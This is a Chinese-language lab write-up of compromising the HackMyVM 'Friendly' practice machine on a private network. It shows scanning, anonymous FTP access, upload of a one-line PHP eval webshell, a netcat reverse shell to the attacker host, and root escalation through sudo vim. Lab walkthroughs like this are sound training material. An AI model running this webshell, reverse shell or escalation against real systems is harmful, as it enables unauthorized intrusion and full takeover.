friendly靶机渗透

笔记于2025/12/1

参照HakcMyVM/Friendly.md at master · pencek/HakcMyVM · GitHub进行复现

靶机介绍:

FTP服务匿名、WEBSHLL上传、vim提权

攻击机IP:192.168.161.139

靶机IP:192.168.161.140

端口扫描

得知开放FTP服务和WEB应用协议

复制代码
nmap -p- 192.168.161.140

详细信息检测

有匿名账户

复制代码
nmap -p21,80 -A 192.168.161.140

WEB渗透测试

网站首页

目录扫描

只有index.html页面

复制代码
gobuster dir -w /usr/share/wordlists/dirbuster-list-2.3-medium.txt -u http://192.168.161.140/ -x php,html,txt -e

FTP服务

复制代码
ftp 192.168.161.140 
#输入账户anonymous,匿名账户没有密码直接回车,继续输入 
ls -al 
#发现跟目录扫描出来一个框架

上传webshell

复制代码
<?php eval($_POST['x']);?>

上传

复制代码
put rce.php

攻击机开启监听

蚁剑连接webshell,终端执行命令

复制代码
nc -e /bin/bash 192.168.161.139 6666

内网渗透

拿到user.txt

信息收集

复制代码
sudo -l

内网提权

复制代码
https://gtfobins.github.io/gtfobins/vim/#sudo

执行提权命令

复制代码
sudo /usr/bin/vim -c '!/bin/bash'

拿到root.txt,这里的/root/root.txt是假的flag

复制代码
find / -type f -name 'root.txt'

渗透测试收获

FTP匿名登录体验和FTP服务基本命令、新的提权vim提权

相关推荐
tingshuo291718 小时前
S001 【模板】从前缀函数到KMP应用 字符串匹配 字符串周期
笔记
用户962377954481 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954481 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star1 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
BingoGo2 天前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php
JaguarJack2 天前
当你的 PHP 应用的 API 没有限流时会发生什么?
后端·php·服务端
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全